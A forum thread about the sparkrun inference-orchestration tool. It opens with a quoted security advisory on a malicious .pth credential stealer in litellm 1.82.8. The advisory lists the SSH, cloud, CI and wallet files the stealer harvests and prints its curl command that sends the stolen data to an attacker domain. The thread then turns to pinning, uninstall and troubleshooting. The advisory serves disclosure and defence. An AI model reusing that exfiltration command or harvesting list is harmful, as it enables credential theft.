Sparkrun - central command with tab completion for launching inference on Spark Clusters

mrtime · March 24, 2026, 6:11pm

[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer

opened 11:48AM - 24 Mar 26 UTC

llm translation potential-duplicate

[LITELLM TEAM] - For updates from the team, please see: https://github.com/Berri…AI/litellm/issues/24518

---

# [Security]: CRITICAL: Malicious `litellm_init.pth` in litellm 1.82.8 PyPI package - credential stealer

## Summary

The `litellm==1.82.8` wheel package on PyPI contains a malicious `.pth` file (`litellm_init.pth`, 34,628 bytes) that **automatically executes a credential-stealing script every time the Python interpreter starts**; no `import litellm` is required.

This is a supply chain compromise. The malicious file is listed in the package's own `RECORD`:

```
litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628
```

## Reproduction

```bash
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"
```

You will see `litellm_init.pth` containing:

```python
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])
```

## Malicious Behavior (full analysis)

The payload is **double base64-encoded**. When decoded, it performs the following:

### Stage 1: Information Collection

The script collects sensitive data from the host system:

- **System info**: `hostname`, `whoami`, `uname -a`, `ip addr`, `ip route`
- **Environment variables**: `printenv` (captures all API keys, secrets, tokens)
- **SSH keys**: `~/.ssh/id_rsa`, `~/.ssh/id_ed25519`, `~/.ssh/id_ecdsa`, `~/.ssh/id_dsa`, `~/.ssh/authorized_keys`, `~/.ssh/known_hosts`, `~/.ssh/config`
- **Git credentials**: `~/.gitconfig`, `~/.git-credentials`
- **AWS credentials**: `~/.aws/credentials`, `~/.aws/config`, IMDS token + security credentials
- **Kubernetes secrets**: `~/.kube/config`, `/etc/kubernetes/admin.conf`, `/etc/kubernetes/kubelet.conf`, `/etc/kubernetes/controller-manager.conf`, `/etc/kubernetes/scheduler.conf`, service account tokens
- **GCP credentials**: `~/.config/gcloud/application_default_credentials.json`
- **Azure credentials**: `~/.azure/`
- **Docker configs**: `~/.docker/config.json`, `/kaniko/.docker/config.json`, `/root/.docker/config.json`
- **Package manager configs**: `~/.npmrc`, `~/.vault-token`, `~/.netrc`, `~/.lftprc`, `~/.msmtprc`, `~/.my.cnf`, `~/.pgpass`, `~/.mongorc.js`
- **Shell history**: `~/.bash_history`, `~/.zsh_history`, `~/.sh_history`, `~/.mysql_history`, `~/.psql_history`, `~/.rediscli_history`
- **Crypto wallets**: `~/.bitcoin/`, `~/.litecoin/`, `~/.dogecoin/`, `~/.zcash/`, `~/.dashcore/`, `~/.ripple/`, `~/.bitmonero/`, `~/.ethereum/keystore/`, `~/.cardano/`, `~/.config/solana/`
- **SSL/TLS private keys**: `/etc/ssl/private/`, Let's Encrypt `.pem` and `.key` files
- **CI/CD secrets**: `terraform.tfvars`, `.gitlab-ci.yml`, `.travis.yml`, `Jenkinsfile`, `.drone.yml`, `Anchor.toml`, `ansible.cfg`
- **Database credentials**: PostgreSQL, MySQL, Redis, LDAP config files
- **Webhook URLs**: grep for Slack/Discord webhook URLs in env and config files

### Stage 2: Encryption & Exfiltration

1. Collected data is written to a temporary file
2. A random 32-byte AES-256 session key is generated via `openssl rand`
3. The collected data is encrypted with `openssl enc -aes-256-cbc -pbkdf2`
4. The AES session key is encrypted with a **hardcoded 4096-bit RSA public key** via `openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep`
5. Both encrypted files are packed into `tpcp.tar.gz`
6. The archive is exfiltrated via:

```bash
curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz
```

## Key Technical Details

- **Trigger mechanism**: `.pth` files in `site-packages/` are executed automatically by the Python interpreter on startup (see [Python docs on .pth files](https://docs.python.org/3/library/site.html)). No `import` statement is needed.
- **Stealth**: The payload is double base64-encoded, making it invisible to naive source code grep.
- **Exfiltration target**: `https://models.litellm.cloud/`; note the domain `litellm.cloud` (NOT `litellm.ai`, the official domain).
- **RSA public key** (first 64 chars): `MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...`

## Impact

Anyone who installed `litellm==1.82.8` via pip has had **all environment variables, SSH keys, cloud credentials, and other secrets** collected and sent to an attacker-controlled server.

This affects:

- Local development machines
- CI/CD pipelines
- Docker containers
- Production servers

## Affected Version

- **Confirmed**: `litellm==1.82.8` (PyPI wheel `litellm-1.82.8-py3-none-any.whl`)
- **Other versions**: Not yet checked; the attacker may have compromised multiple releases

## Recommended Actions

1. **PyPI**: Yank/remove litellm 1.82.8 immediately
2. **Users**: Check for `litellm_init.pth` in your `site-packages/` directory
3. **Users**: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
4. **BerriAI**: Audit PyPI publishing credentials and CI/CD pipeline for compromise

## Environment

- OS: Ubuntu 24.04 (Docker container)
- Python: 3.13
- pip installed from PyPI
- Discovered: 2026-03-24
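For the "check for `litellm_init.pth` in your `site-packages/`" step, here is a minimal Python sketch. It relies on the documented behaviour of the `site` module: a `.pth` line is executed only if it starts with `import` followed by a space or tab. The function name `find_executable_pth_lines` is hypothetical and is not part of litellm or sparkrun. Running it as `python3 -S script.py` should keep the interpreter from processing any `.pth` files while the scan runs.

```python
from pathlib import Path


def find_executable_pth_lines(directories):
    """Return {pth_path: [lines the site module would exec]} for the given dirs."""
    findings = {}
    for directory in directories:
        root = Path(directory)
        if not root.is_dir():
            continue  # e.g. a user site dir that was never created
        for pth in sorted(root.glob("*.pth")):
            try:
                text = pth.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            # site.py executes .pth lines that start with "import" + space/tab
            hits = [ln for ln in text.splitlines()
                    if ln.startswith(("import ", "import\t"))]
            if hits:
                findings[str(pth)] = hits
    return findings


if __name__ == "__main__":
    import site

    dirs = site.getsitepackages() + [site.getusersitepackages()]
    for path, lines in find_executable_pth_lines(dirs).items():
        flag = "SUSPECT" if Path(path).name == "litellm_init.pth" else "review"
        print(f"[{flag}] {path}")
        for ln in lines:
            print("   ", ln[:120])
```

Some legitimate packages also ship `.pth` files with `import` lines, so a "review" entry is not proof of compromise on its own. The file name `litellm_init.pth` is the indicator named in the issue.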

dbsci · March 25, 2026, 6:17am

Very, very, very scary. Crazy/ironic that the leak of the litellm credentials is being blamed on a Trivy leak – and Trivy is a very commonly used security tool.

sparkrun will now pin particular versions of all dependencies to reduce risk of supply chain attacks that may affect sparkrun. Next release is coming this week and it’s a major release.

aceangel · March 26, 2026, 7:13pm

Was sparkrun affected by the liteLLM infected release?

dbsci · March 26, 2026, 8:29pm

Unfortunately, sparkrun’s version was unpinned, so it entirely depends on when you launched the proxy. There was a window of a few hours when it would’ve been at risk if you freshly launched the proxy during that window.

Next version of sparkrun pins everything and also has security against shell injection attacks in recipes.
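To illustrate what "pinned" means here, a small sketch that flags requirement strings that do not name exactly one version. It is a simplified check written for this thread, not sparkrun's implementation. The helper name `unpinned` and the package `example-pkg` are hypothetical, and the regex deliberately handles only plain `name==version` specifiers.

```python
import re

# Matches "name==1.2.3" or "name[extra]==1.2.3".
# Wildcards such as "==1.82.*" are rejected because they allow several versions.
_EXACT_PIN = re.compile(
    r"^[A-Za-z0-9._-]+(\[[A-Za-z0-9._,\s-]+\])?\s*==\s*[^\s*;,]+$"
)


def unpinned(requirements):
    """Return the requirement strings that are not pinned to one exact version."""
    loose = []
    for req in requirements:
        spec = req.split(";", 1)[0].strip()  # drop environment markers
        if spec and not spec.startswith("#") and not _EXACT_PIN.match(spec):
            loose.append(req)
    return loose


print(unpinned(["litellm", "litellm>=1.80", "litellm==1.82.*", "example-pkg==2.0.1"]))
# → ['litellm', 'litellm>=1.80', 'litellm==1.82.*']
```

An unpinned entry resolves to whatever is newest at install time, which is why a fresh launch during the affected window could have pulled the compromised release. A version pin narrows that window. pip's hash-checking mode (`--require-hashes`) goes further by also fixing the exact artifact.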

dbsci · March 27, 2026, 1:06am

sparkrun has been updated. This is a big update (including transition to next minor version, 0.2.x).

First and foremost, this release marks the official transition of sparkrun to being part of the spark-arena organization. The git repo is now at: https://github.com/spark-arena/sparkrun to reflect sparkrun’s position as an effort for the community.

Beyond that, lots of changes:

Documentation Revamp
Spark Arena Integration (integrated login & benchmarking)
Security (work on shell injection protection for recipes; pinning all dependency versions; non-root user and non-privileged containers by default)
Fixes for cross-platform cache paths
Additional commands to enable automation and external use of sparkrun for orchestration
Addition of systemd service export
Tighter integration with eugr-vllm-docker
Intended to align with new spark-arena images for eugr vllm and llama.cpp (sglang coming soon)
Ability to configure transfer interface preferences as part of cluster configuration
Lots of bug fixes and internal architecture improvements
New setup wizard for better installation/setup experience for new users

I’ll post more shortly about how to get started with some of the new functionality.

FlossingEnthusiast · March 28, 2026, 3:42pm

@dbsci Just updated sparkrun (awesome project, thank you!), and the version was updated to 0.2.6:

dgx-spark:~$ sparkrun update
Checking for sparkrun updates (current: 0.2.3)…
sparkrun updated: 0.2.3 → 0.2.6

Updating recipe registries…
Updating 6 registries…
Updating sparkrun-testing… done
Updating sparkrun-transitional… done
Updating official… done
Updating experimental… done
Updating eugr… done
Updating community… done
6 registries updated.
dgx-spark:~$

The releases page ( Releases · spark-arena/sparkrun · GitHub ) shows 0.2.5 as being the most recent. Something I’m missing?

dbsci · March 28, 2026, 4:28pm

No. Sometimes I don’t end up listing the release as a github release. v0.2.6 was a quick fix to handle some issues that’ll come up for some edge cases. I quickly pushed out the patch and didn’t mark the release.

There is a tag, PR, and all the other things there to mark it – just not the “release” itself.

So you’re not missing anything.

FlossingEnthusiast · March 28, 2026, 4:41pm

Awesome, thank you for the explanation!

danielkrns · March 28, 2026, 9:22pm

How easy is sparkrun to uninstall and remove its changes (even after running the setup wizard)?

dbsci · March 28, 2026, 10:06pm

Why would you ever want to do that???

Well it does a bunch of stuff and it depends on how much you do in the wizard – you can also choose to say no for lots of steps if you prefer how you did it yourself – but some of the setup wizard steps are pretty much a crystallization of experience of what typically helps people who are new to the spark, so you might want those even if you don’t use sparkrun…

Anyway, it’s a fair question, so I’ve written more detailed explanation below. And FYI, because of your questions, I’ve also started on making an uninstall so that it can remove itself more thoroughly – so that’ll probably come in the next release or so.

It installs itself as a uv tool, so uv tool uninstall sparkrun to remove it.

It creates two metadata directories:
~/.config/sparkrun for configuration stuff
~/.cache/sparkrun for cache stuff

Tab autocompletion adds this to ~/.bashrc:

# sparkrun tab-completion
eval "$(_SPARKRUN_COMPLETE=bash_source sparkrun)"

so remove those two lines to get rid of tab completion.

The other changes the wizard makes are marginally more complicated to remove because it’s part of basic cluster setup and isn’t necessarily specific to sparkrun:

SSH meshing (it saves ssh keys among node members) – you can remove/reduce authorized keys list (~/.ssh/authorized_keys for cluster user) but you probably want this in your cluster.
It adds user to the docker group if it’s not already there – you probably want that.
It adds targeted sudoers entries for clearing page cache and fixing HF cache dir permissions – relatively low risk of abuse, and that’s why it uses very targeted sudoers entries instead of broadly giving sudo rights (EDIT: /etc/sudoers.d/sparkrun-*; always uses sparkrun- prefix on sudo rules for traceability)
CX7 configuration – it’ll either create or edit the netplan config if you want it to; it only recommends changes if your setup doesn’t meet the guidelines

As an alternative to the wizard, you can also install with uvx sparkrun setup install, which does the uv tool install and the tab completion and puts initial files in the config/cache directories, but doesn’t direct you to the wizard, so you keep full control over everything else. Undoing the uv tool install, removing tab completion, and deleting the cache/config directories is a relatively straightforward and complete removal.
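The per-user part of that removal can be sketched in Python as below. This is a sketch under assumptions, not an official uninstaller. It assumes the Linux paths and the two `~/.bashrc` lines quoted above, the function name `cleanup` is hypothetical, and it defaults to a dry run. It does not run `uv tool uninstall sparkrun` and does not touch SSH keys, the docker group, sudoers entries, or netplan.

```python
import shutil
from pathlib import Path

# The two lines the tab-completion step adds to ~/.bashrc (quoted in this thread)
COMPLETION_LINES = {
    "# sparkrun tab-completion",
    'eval "$(_SPARKRUN_COMPLETE=bash_source sparkrun)"',
}


def cleanup(home, dry_run=True):
    """List (and, if dry_run is False, remove) sparkrun's per-user footprint."""
    home = Path(home)
    actions = []
    for rel in (".config/sparkrun", ".cache/sparkrun"):
        target = home / rel
        if target.is_dir():
            actions.append(f"remove {target}")
            if not dry_run:
                shutil.rmtree(target)
    bashrc = home / ".bashrc"
    if bashrc.is_file():
        lines = bashrc.read_text().splitlines(keepends=True)
        kept = [ln for ln in lines if ln.strip() not in COMPLETION_LINES]
        if len(kept) != len(lines):
            actions.append(f"strip completion lines from {bashrc}")
            if not dry_run:
                bashrc.write_text("".join(kept))
    return actions


if __name__ == "__main__":
    # Dry run: only reports what would change
    for action in cleanup(Path.home(), dry_run=True):
        print("would", action)
```

Calling `cleanup(Path.home(), dry_run=False)` applies the changes. A second call returns an empty list because nothing is left to remove.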

So it depends why you’re asking – but I’ve taken care to try to keep the footprint relatively minimal (e.g. targeted sudoers entries and not blanket sudo access). The other points are essentially just applying best practices and support, but outside of the initial installation, everything in the wizard is technically optional but then you’re responsible for setting it up.

danielkrns · March 28, 2026, 11:14pm

It’s partially my own paranoia, but I am thinking back to my experience with other frameworks like Conda, where you can find creative ways of messing up an installation, like running the setup wizard twice or having something in the configuration change after an update to the machine or framework.

In my experience small changes sneak up on you. So I care about understanding them.

dbsci · March 28, 2026, 11:20pm

Totally fair. I started with “why would you want to…” in a light joking way :-)

Also you can run the setup wizard multiple times here – it’s meant to guide you through stuff and generally its changes are idempotent – like there is no harm in trying to add yourself to docker group 50x – you’ll only end up added 1x.

Edit: in fact, I would recommend people run the wizard again if they were adding more nodes or stuff like that – because it automates the process – and any steps that are “redundant” to do, are performed in an idempotent way such that there is no harm in running it again.
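As a generic illustration of what "idempotent" means for a setup step (this is not sparkrun's actual code, and the helper name `ensure_line` is hypothetical), here is a sketch that adds a line to a file only when it is not already present:

```python
from pathlib import Path


def ensure_line(path, line):
    """Append `line` to the file unless an identical line is already there.

    Returns True if the file was changed, False if it was already in place.
    """
    path = Path(path)
    existing = path.read_text().splitlines() if path.exists() else []
    if line in existing:
        return False  # already applied: running again is a no-op
    # Start on a fresh line if the file does not end with a newline
    prefix = "" if not existing or path.read_text().endswith("\n") else "\n"
    with path.open("a") as fh:
        fh.write(f"{prefix}{line}\n")
    return True
```

Calling `ensure_line` 50 times with the same arguments changes the file once and returns `False` the other 49 times, which is the same property as the docker group example above.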

(And I am adding uninstall since you brought it up as well – the wizard will keep track of what it’s done and then you’ll be able to uninstall against that record.)

sparkrun’s core functionality tries to stay contained to its metadata and cache directories basically, but because it’s an orchestration tool, it does have to touch other things as part of setup. Once setup (either manually or via the wizard), it basically keeps to itself. You could essentially “factory reset” sparkrun by deleting the cache and metadata directories.

danielkrns · March 29, 2026, 12:00am

Unrelated, but for some reason the site “sparkrun.dev” is blocked by my DNS provider. It seems Bezeq BCyber blacklisted your site for some reason 🤷‍♂️, can still get to it with other DNSs though.

dbsci · March 29, 2026, 12:32am

That’s really weird… I can’t really imagine why… glad you can get to it otherwise because I have a lot more docs on the site – github has README and a few things but most docs are on the website.

AoE · March 29, 2026, 7:50am

I’ve had this in the past because of the rule which blocks newly registered domains.

danielkrns · April 6, 2026, 10:46pm

Hi, I’m running sparkrun and hitting a build failure during the Docker image build step. The apt install seems to fail because several package versions aren’t available on ports.ubuntu.com.

The build downloads 457 MB successfully but then fails with:

E: Failed to fetch http://ports.ubuntu.com/.../python3-wheel_0.42.0-2_all.deb
E: Failed to fetch http://ports.ubuntu.com/.../python3-pip_24.0+dfsg-1ubuntu1.3_all.deb
E: Failed to fetch http://ports.ubuntu.com/.../vim_9.1.0016-1ubuntu7.10_arm64.deb
E: Failed to fetch http://ports.ubuntu.com/.../libibverbs-dev_50.0-2ubuntu0.2_arm64.deb

The host machine can reach ports.ubuntu.com. The packages just don’t appear to exist at those exact versions for ARM64 on my Ubuntu release.

Error: RuntimeError: eugr container build failed (exit 1)

Is this a known issue? Is there a workaround?

I used “sparkrun run @eugr/gemma4-26b-a4b” but it happens with any recipe from @eugr.

dbsci · April 6, 2026, 10:56pm

I haven’t come across that. The problem is related to the build step and specific to building the spark-vllm-docker image.

One thing you can try as an alternative is to use:

sparkrun run @eugr/gemma4-26b-a4b --image "ghcr.io/spark-arena/dgx-vllm-eugr-nightly-tf5:20260406"

The --image flag overrides the image in the recipe with a fixed, specific image version. The Spark Arena dgx-vllm-eugr images are built to stay up-to-date with the current spark-vllm-docker. Typically, building the images locally is the faster way to get the latest version; however, that’s obviously not the case if the build isn’t working for you at all. This should hopefully bypass the build and let you download a prebuilt image from our GitHub container registry.

danielkrns · April 6, 2026, 10:58pm

Also, I updated sparkrun and now the recipes that used to work fail for me:

sparkrun run @sparkrun-transitional/qwen3.5-35b-a3b-fp8-sglang
sparkrun v0.2.20



Runtime:   sglang
Image:     scitrera/dgx-spark-sglang:0.5.9-dev1-329817e2-t5
Model:     Qwen/Qwen3.5-35B-A3B-FP8
Mode:      solo
Warning: You are sending unauthenticated requests to the HF Hub. Please set a HF_TOKEN to enable higher rate limits and faster downloads.
Warning: You are sending unauthenticated requests to the HF Hub. Please set a HF_TOKEN to enable higher rate limits and faster downloads.

VRAM Estimation:
Model dtype:      fp8
Model params:     35,953,925,552
KV cache dtype:   bfloat16
Architecture:     40 layers, 2 KV heads, 256 head_dim
Model weights:    33.48 GB
KV cache:         20.00 GB (max_model_len=262,144)
Tensor parallel:  1
Per-GPU total:    53.48 GB
DGX Spark fit:    YES

GPU Memory Budget:
gpu_memory_utilization: 80%
Usable GPU memory:     96.8 GB (121 GB x 80%)
Available for KV:      63.3 GB
Max context tokens:    829,886
Context multiplier:    3.2x (vs max_model_len=262,144)

Hosts:     default cluster ‘mylab’
Target:  127.0.0.1

[1/6] Preparing
done (0.0s)
[2/6] Building image — skipped (no builder)
[3/6] Distributing resources
SSH script ← 127.0.0.1 FAILED rc=255 (0.1s): dalsp@127.0.0.1: Permission denied (publickey,password).
Checking container image on 1 host(s)
SSH cmd ← 127.0.0.1 FAILED rc=255 (0.1s): dalsp@127.0.0.1: Permission denied (publickey,password).
SSH script ← 127.0.0.1 FAILED rc=255 (0.1s): dalsp@127.0.0.1: Permission denied (publickey,password).
Failed to ensure Image 'scitrera/dgx-spark-sglang:0.5.9-d

I get this with what you suggested too now

I think I managed to break your program :P
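As an aside, the "VRAM Estimation" and "GPU Memory Budget" figures in the log above can be reproduced with simple arithmetic. The sketch below uses the standard per-token KV-cache size (K and V, per layer, per KV head, per head dimension, times bytes per element). Two points are assumptions inferred from the numbers matching rather than confirmed from sparkrun's source: that this is the formula sparkrun uses, and that the values labelled "GB" are binary gigabytes (2^30 bytes).

```python
GIB = 1024 ** 3

# Figures copied from the log output above
params = 35_953_925_552
layers, kv_heads, head_dim = 40, 2, 256
max_model_len = 262_144
total_gpu_gib, utilization = 121, 0.80

weight_bytes = params * 1  # fp8: 1 byte per parameter
# K and V tensors, per layer and KV head, bfloat16 = 2 bytes per element
kv_bytes_per_token = 2 * layers * kv_heads * head_dim * 2
kv_bytes = kv_bytes_per_token * max_model_len

usable_bytes = total_gpu_gib * utilization * GIB
available_for_kv = usable_bytes - weight_bytes
max_tokens = int(available_for_kv // kv_bytes_per_token)

print(f"Model weights:      {weight_bytes / GIB:.2f} GB")
print(f"KV cache:           {kv_bytes / GIB:.2f} GB")
print(f"Per-GPU total:      {(weight_bytes + kv_bytes) / GIB:.2f} GB")
print(f"Usable GPU memory:  {usable_bytes / GIB:.1f} GB")
print(f"Available for KV:   {available_for_kv / GIB:.1f} GB")
print(f"Max context tokens: {max_tokens:,}")
print(f"Context multiplier: {max_tokens / max_model_len:.1f}x")
```

Each token costs 81,920 bytes of KV cache under these settings, so the 262,144-token context accounts for the 20.00 GB line, and the remaining budget after the weights gives the 829,886-token maximum shown in the log.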

dbsci · April 6, 2026, 11:00pm

Is your OS username different than the “cluster” username? If so, you should rerun sparkrun setup ssh to enable SSH to self. I know that sounds ridiculous, but basically you need to authenticate if the username is different.
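To confirm whether SSH-to-self works before rerunning a recipe, a small probe like the following may help. It is a sketch, not part of sparkrun, and the function names are hypothetical. It uses the standard OpenSSH options `BatchMode=yes` (fail instead of prompting for a password) and `ConnectTimeout`.

```python
import subprocess


def ssh_probe_command(user, host="127.0.0.1"):
    """Build a non-interactive ssh command that succeeds only without prompts."""
    return ["ssh", "-o", "BatchMode=yes", "-o", "ConnectTimeout=5",
            f"{user}@{host}", "true"]


def can_ssh(user, host="127.0.0.1"):
    """Return True if `ssh user@host true` exits 0 without asking for input."""
    try:
        result = subprocess.run(ssh_probe_command(user, host),
                                capture_output=True, text=True, timeout=15)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return False  # ssh client missing, or the connection hung
    return result.returncode == 0
```

For the log above, `can_ssh("dalsp")` returning `False` would be consistent with the `Permission denied (publickey,password)` errors, and rerunning `sparkrun setup ssh` is the suggested fix.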

danielkrns · April 6, 2026, 11:08pm

I’ll keep you posted, but I think I might have figured it out: if I create another cluster with the setup wizard, it seems to run. The previous profile probably got messed up during the update; perhaps using “uv tool update” wasn’t the best idea.
